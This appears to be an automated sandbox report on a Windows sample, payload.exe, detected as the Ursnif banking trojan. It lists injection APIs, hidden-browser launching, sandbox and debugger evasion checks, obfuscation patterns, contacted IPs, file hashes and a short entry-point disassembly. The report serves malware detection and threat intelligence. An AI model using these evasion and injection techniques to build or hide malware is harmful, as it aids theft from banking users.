Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://yellowpages.superpages.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://yellowpages.superpages.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
Source: payload.exe, 00000001.00000002.22428521610.01280000.00000040.sdmp, iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmp, iexplore.exe, 00000004.00000002.22318106587.03265000.00000004.sdmp, httpErrorPagesScripts[1].4.drString found in binary or memory: https://
Source: payload.exe, 00000001.00000002.22428521610.01280000.00000040.sdmpString found in binary or memory: https://POST
Source: iexplore.exe, 00000004.00000002.22317162021.02DE0000.00000008.sdmpString found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: https://example.com
Source: iexplore.exe, 00000003.00000002.22413107787.0029E000.00000004.sdmpString found in binary or memory: https://r20swj13mr.microsoft
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: iexplore.exe, 00000003.00000002.22416127969.02E39000.00000004.sdmpString found in binary or memory: https://www.bing.com/D
Source: iexplore.exe, 00000003.00000002.22416073967.02E20000.00000004.sdmpString found in binary or memory: https://www.bing.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22416073967.02E20000.00000004.sdmpString found in binary or memory: https://www.bing.com/favicon.icoml
Source: iexplore.exe, 00000003.00000002.22413107787.0029E000.00000004.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: https://www.example.com.
Source: iexplore.exe, 00000003.00000002.22416027227.02DF0000.00000004.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&NTLogo=1
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

barindex
Detected Ursnif banking trojanShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00401B1C1_2_00401B1C

System Summary:

barindex
Starts Internet Explorer in hidden modeShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeWindow hidden: window name: IEFrameJump to behavior
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_0040134B memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,1_2_0040134B
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_004015E5 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,1_2_004015E5
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00401203 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,1_2_00401203
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_0040218D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_0040218D
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_004015A6 NtMapViewOfSection,RtlNtStatusToDosError,1_2_004015A6
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_004025C0 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_004025C0
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00402653 GetModuleHandleA,GetCursorPos,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,1_2_00402653
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00402603 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_00402603
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00402F99 NtQueryVirtualMemory,1_2_00402F99
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_0040259F NtGetContextThread,RtlNtStatusToDosError,1_2_0040259F
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00402D2C NtGetContextThread,1_2_00402D2C
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A3B68 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_012A3B68
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012AE040 NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_012AE040
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012AE018 NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_012AE018
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00402D781_2_00402D78
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A29221_2_012A2922
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A8F3C1_2_012A8F3C
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: String function: 00402BB3 appears 134 times
Source: C:\Users\user\Desktop\payload.exeCode function: String function: 00401CAE appears 156 times
Source: C:\Users\user\Desktop\payload.exeCode function: String function: 00402E18 appears 155 times
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal72.bank.evad.winEXE@6/12@0/2
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A5103 CoCreateInstance,1_2_012A5103
Creates files inside the user directoryShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\~DF281A968BBB46B987.TMPJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: payload.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\payload.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: payload.exevirustotal: Detection: 53%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\payload.exe 'C:\Users\user\Desktop\payload.exe'
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -newJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00402D67 push ecx; ret 1_2_00402D77
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A8F2B push ecx; ret 1_2_012A8F3B
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004019C6 push eax; ret 1_1_00401AD3
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402AD7 push eax; ret 1_1_00401355
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402AD7 push eax; ret 1_1_00402B50
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004015CA push eax; ret 1_1_00401629
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_0040274E push eax; ret 1_1_004027C9
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402AD0 push dword ptr [00404000h]; ret 1_1_00402AD6
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401AD4 push eax; ret 1_1_00401B81
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401557 push eax; ret 1_1_004015BF
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401557 push eax; ret 1_1_004026E6
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004027D7 push eax; ret 1_1_004023EE
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004027D7 push eax; ret 1_1_0040285E
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_0040225D push eax; ret 1_1_004019C0
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_0040225D push eax; ret 1_1_004022E3
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402B5D push eax; ret 1_1_00402BAE
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004024DE push eax; ret 1_1_0040256C
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402CDE push eax; ret 1_1_00402D87
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401364 push eax; ret 1_1_004013FD
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401364 push eax; ret 1_1_00402C41
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401FE4 push eax; ret 1_1_00402060
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004026E8 push eax; ret 1_1_0040273F
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004026E8 push eax; ret 1_1_00402AC3
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402868 push eax; ret 1_1_00402901
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004022EC push eax; ret 1_1_00402384
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004022EC push eax; ret 1_1_0040267C
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402070 push eax; ret 1_1_00401D9B
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00402070 push eax; ret 1_1_004020E6
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004023F0 push eax; ret 1_1_0040244F
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_00401BF1 push eax; ret 1_1_00401C9E
Source: C:\Users\user\Desktop\payload.exeCode function: 1_1_004020F1 push eax; ret 1_1_00402178

Hooking and other Techniques for Hiding and Protection:

barindex
Writes registry values via WMIShow sources
Source: C:\Users\user\Desktop\payload.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\payload.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\payload.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\payload.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\payload.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes / dynamic malware analysis system (cursor check)Show sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_004010701_2_00401070
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\Desktop\payload.exeWindow / User API: threadDelayed 646Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-3081
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\payload.exe TID: 3712Thread sleep count: 646 > 30Jump to behavior
Source: C:\Users\user\Desktop\payload.exe TID: 3712Thread sleep time: -38760000s >= -60000sJump to behavior
Source: C:\Users\user\Desktop\payload.exe TID: 3768Thread sleep time: -60000s >= -60000sJump to behavior
Program exit pointsShow sources
Source: C:\Users\user\Desktop\payload.exeAPI call chain: ExitProcess graph end nodegraph_1-3044
Source: C:\Users\user\Desktop\payload.exeAPI call chain: ExitProcess graph end nodegraph_1-3036

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\payload.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00401203 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,1_2_00401203

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: payload.exe, 00000001.00000002.22428381697.00530000.00000002.sdmpBinary or memory string: Progman
Source: payload.exe, 00000001.00000002.22428381697.00530000.00000002.sdmpBinary or memory string: Program Manager
Source: payload.exe, 00000001.00000002.22428381697.00530000.00000002.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A44A2 cpuid 1_2_012A44A2
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_012A1BC6 GetSystemTimeAsFileTime,HeapFree,1_2_012A1BC6
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\payload.exeCode function: 1_2_00401AA8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00401AA8
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 72253 Sample: payload Startdate: 13/08/2018 Architecture: WINDOWS Score: 72 22 Multi AV Scanner detection for submitted file 2->22 7 payload.exe 2->7         started        10 iexplore.exe 23 47 2->10         started        process3 dnsIp4 24 Detected Ursnif banking trojan 7->24 26 Tries to detect sandboxes / dynamic malware analysis system (cursor check) 7->26 28 Writes registry values via WMI 7->28 30 Creates a COM Internet Explorer object 7->30 18 cs9.wpc.v0cdn.net 152.199.19.161, 443, 49170, 49171 ANSBB-ASNNET-1-AdvancedNetworksServicesIncUS United States 10->18 32 Starts Internet Explorer in hidden mode 10->32 13 iexplore.exe 14 10->13         started        signatures5 process6 dnsIp7 20 195.123.212.153, 80 ITL-LV Ukraine 13->20 16 ssvagent.exe 6 13->16         started        process8

Simulations

Behavior and APIs

TimeTypeDescription
14:03:27API Interceptor1109x Sleep call for process: iexplore.exe modified
14:03:27API Interceptor738x Sleep call for process: payload.exe modified
14:03:29API Interceptor1x Sleep call for process: ssvagent.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
payload.exe54%virustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cs9.wpc.v0cdn.net0%virustotalBrowse

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

windows-stand

Startup

  • System is w7
  • payload.exe (PID: 3556 cmdline: 'C:\Users\user\Desktop\payload.exe' MD5: 9CB0D02CBC93981015F6C050A0778CFD)
  • iexplore.exe (PID: 3772 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)
    • iexplore.exe (PID: 3828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)
      • ssvagent.exe (PID: 3880 cmdline: 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new MD5: 0953A0264879FD1E655B75B63B9083B7)
  • cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\JavaDeployReg.log
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):89
Entropy (8bit):4.444316889094987
Encrypted:false
MD5:E39E843636C8767DCABA07759491D8DB
SHA1:161A0E118CC29DEA9CA3EB1AAF85ABE6CFAB5929
SHA-256:9EDFC70826B8D8B781ABC70E10D1A42B89BAA393B506A3748C608693AD9016EB
SHA-512:58B13942E25AED7753B55F56E77591C8EF1DB6160786D9FC68173137EBDA724033F633CCA74B42CF459966D70C7CFF0754A7BF18B8CBE03840CEDCCEA4B83E88
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\~DF094EE36918159728.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:data
Size (bytes):39521
Entropy (8bit):0.9619404867412173
Encrypted:false
MD5:2036E7109356399BE73DDCB39C1888C5
SHA1:DD33E0F97C2850585965F3E152609F9DC6236F71
SHA-256:70FD390B8FE6494A7B2521D98C7CF695DF3B83E0693E74A0D17EBA3D37496801
SHA-512:9401E5D837DCB564E6509E72CA2B518C3CC2CF4F498B2A1153ACBB0B5066F931208BCBAD7FDBAB9507D33F130E7DCECE6C6A8115402258EEA4C9B0F7DA8EE235
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\~DF281A968BBB46B987.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:data
Size (bytes):12933
Entropy (8bit):0.4149132859771079
Encrypted:false
MD5:4371D5DE7C3B3531C2F537A7DBD92CDE
SHA1:DF5698BCB719BA4ADEB6F73A6129F8DC85A392D6
SHA-256:364B7FF729311EE6342E1EBBAEFEBDEF6676421F8B3CAAFC9748D2D01389AE31
SHA-512:7ED5C92CDDE5C4AE13959BAC2EE8BFF673C9821604E173AD3B28694865A6553C23827A2FC7569EA9B761B244D1D2AE0370B842099DA469F6A8B307CBF5CD8468
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2BC0F91-9EF0-11E8-B7AC-B2C276BF9C88}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):29272
Entropy (8bit):1.7733633340595316
Encrypted:false
MD5:6EA6E29A2BA248C4FB2919E02307398A
SHA1:F1BE5C7EADB01E9EC9BBA858F06DE30A49C3761B
SHA-256:4C237616F90AA56591D2DDBBE12B72AAB041C126DCB3700EE62C6BC68488E8D0
SHA-512:694D8A7537EB017A0C5C484A3E626BA08C33FC1E21C46EAA064BE774F086125A64CA7D64072F2F56159EAB929612E50AC9D04EBC80581063C59147EE13715BE2
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E2BC0F93-9EF0-11E8-B7AC-B2C276BF9C88}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):27312
Entropy (8bit):1.8270581926954415
Encrypted:false
MD5:9F3D5B089731D1769B02F0BF7BF0E1E2
SHA1:115A3575A8A6EDA6BABEA94CE642D23B702EF0E5
SHA-256:F945FAA06B035677C1C4E589535A121AC0CDAE42A9CF5E8C7A915AD03390C267
SHA-512:E0FA6E360F46BACC1E4429E1DA89164393F70D2F3C5E88343BDE1C39DB55F79C616ED9E1739B5D2EA32493453D90417A967ED06A18F9233DA20A5F12D81B82F3
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\errorPageStrings[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) English text, with CRLF line terminators
Size (bytes):3470
Entropy (8bit):5.07679088805991
Encrypted:false
MD5:6B26ECFA58E37D4B5EC861FCDD3F04FA
SHA1:B69CD71F68FE35A9CE0D7EA17B5F1B2BAD9EA8FA
SHA-256:7F7D1069CA8A852C1C8EB36E1D988FE6A9C17ECB8EFF1F66FC5EBFEB5418723A
SHA-512:1676D43B977C07A3F6A5473F12FD16E56487803A1CB9771D0F189B1201642EE79480C33A010F08DC521E57332EC4C4D888D693C6A2323C97750E97640918C3F4
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\dnserror[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:HTML document text
Size (bytes):1857
Entropy (8bit):4.605068478069389
Encrypted:false
MD5:73C70B34B5F8F158D38A94B9D7766515
SHA1:E9EAA065BD6585A1B176E13615FD7E6EF96230A9
SHA-256:3EBD34328A4386B4EBA1F3D5F1252E7BD13744A6918720735020B4689C13FCF4
SHA-512:927DCD4A8CFDEB0F970CB4EE3F059168B37E1E4E04733ED3356F77CA0448D2145E1ABDD4F7CE1C6CA23C1E3676056894625B17987CC56C84C78E73F60E08FC0D
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\favicon[2].ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\NewErrorPageTemplate[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):1310
Entropy (8bit):4.810709096040597
Encrypted:false
MD5:CDF81E591D9CBFB47A7F97A2BCDB70B9
SHA1:8F12010DFAACDECAD77B70A3E781C707CF328496
SHA-256:204D95C6FB161368C795BB63E538FE0B11F9E406494BB5758B3B0D60C5F651BD
SHA-512:977DCC2C6488ACAF0E5970CEF1A7A72C9F9DC6BB82DA54F057E0853C8E939E4AB01B163EB7A5058E093A8BC44ECAD9D06880FDC883E67E28AC67FEE4D070A4CC
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\urlblockindex[1].bin
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:data
Size (bytes):16
Entropy (8bit):1.6216407621868583
Encrypted:false
MD5:FA518E3DFAE8CA3A0E495460FD60C791
SHA1:E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\httpErrorPagesScripts[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):8714
Entropy (8bit):5.312819714818054
Encrypted:false
MD5:3F57B781CB3EF114DD0B665151571B7B
SHA1:CE6A63F996DF3A1CCCB81720E21204B825E0238C
SHA-256:46E019FA34465F4ED096A9665D1827B54553931AD82E98BE01EDB1DDBC94D3AD
SHA-512:8CBF4EF582332AE7EA605F910AD6F8A4BC28513482409FA84F08943A72CAC2CF0FA32B6AF4C20C697E1FAC2C5BA16B5A64A23AF0C11EEFBF69625B8F9F90C8FA
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cs9.wpc.v0cdn.net152.199.19.161truefalse0%, virustotal, Browseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
152.199.19.161United States
1326ANSBB-ASNNET-1-AdvancedNetworksServicesIncUSfalse
195.123.212.153Ukraine
50979ITL-LVfalse

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):7.475526133182752
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:payload.exe
File size:56832
MD5:9cb0d02cbc93981015f6c050a0778cfd
SHA1:9bc608af77957f031e9c23424eddd4841fc28784
SHA256:dde2035cc84948a03d5dfa1ac1f97e2b9ecae3d53b3bda3125add1a10a6d5be3
SHA512:d92429fb6dced7ddaf16a347bf9333e588d00b62bdd6b6726d84e6884785f447c57cd9a8cb45c39790d929f12fccdbed04ea78faa4daea57862328850bdbbf9a
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E............H.l.....:.m.......y.....Rich....................PE..L....O1U.................$...........*.......@....@........

File Icon

Static PE Info

General

Entrypoint:0x402ad7
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x55314FC7 [Fri Apr 17 18:24:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:d6cee5686b9eaf5ac075659b5a9daff2

Entrypoint Preview

Instruction
push eax
mov edx, 003456A4h
mov dword ptr [esp], ebp
mov ebp, esp
push 00000004h
add esp, FFFFFFA0h
push dword ptr [004050CFh]
call 6037E043h
push 004050C1h
call 6037E381h
